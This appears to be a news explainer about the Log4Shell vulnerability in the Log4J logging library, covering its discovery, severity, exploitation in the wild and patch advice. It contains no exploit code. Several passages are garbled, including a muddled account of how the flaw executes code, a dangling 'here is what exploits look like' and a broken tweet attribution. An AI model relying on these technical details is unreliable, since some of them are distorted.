Log4Shell is the name given to a critical zeroday vulnerability that was exploited in the wild in remote-code compromises. Log4J, a logging utility used by thousands of apps, including those used inside just about every enterprise on the planet, was the source of the vulnerability. The canary in the coal mine was theMinecraft server.
It is clear that Log4Shell is a grave threat, with the list of cloud services affected reading like a who's who of biggest names on the Internet. Threat analysts and researchers are still assessing the damage and the outlook over the next few months. Here is what you need to know.
Log4J and Log4Shell are big deals. Log4J is an open-source logging tool. It can perform network searches using the Java Naming and Directory Interface to get services from the lightweight directory access protocol. Log4j will interpret a log message as a URL, go and fetch it, and execute any program that has full privileges. Exploits can be triggered inside text using the $ syntax, which allows them to be included in browser user agents.
Advertisement
Here is what exploits look like.
The vulnerability has a severity rating of 10 out of 10. The zeroday was exploited at least nine days before it came to light.
The most conclusive evidence we have found so far is the Log4J exploit. It was in the wild at least 9 days before it was publicly disclosed. Don't look for evidence of mass exploitation until after public disclosure.
>
Matthew Prince is on December 11, 2021.
The researchers at the Talos security team observed exploits.
Log4Shell surfaced last Thursday, what has happened since? Greynoise detected scanning attempts to identify vulnerable server. Researchers report seeing this critical and easy-to-exploit vulnerability being used to install a variety of malicious software.
What is the outcome? In a best-case scenario, major brokerages, banks, and merchants will spend huge sums of overtime to get this mess under control during the holidays. You don't want to think about the worst-case scenario, other than to remember the Equifax breach and the compromise of 143 million US consumers' data that followed.
It sounds bad. What should I do? Yes, it is. If you're an end user, there's not much you can do other than hound the services you use and ask what they're doing to keep the data secure. Updating Log4J is the most useful thing the cloud services can do. It is often not that simple for large enterprises. Dozens of security companies have published guidance. Microsoft and Sophos have advice here.
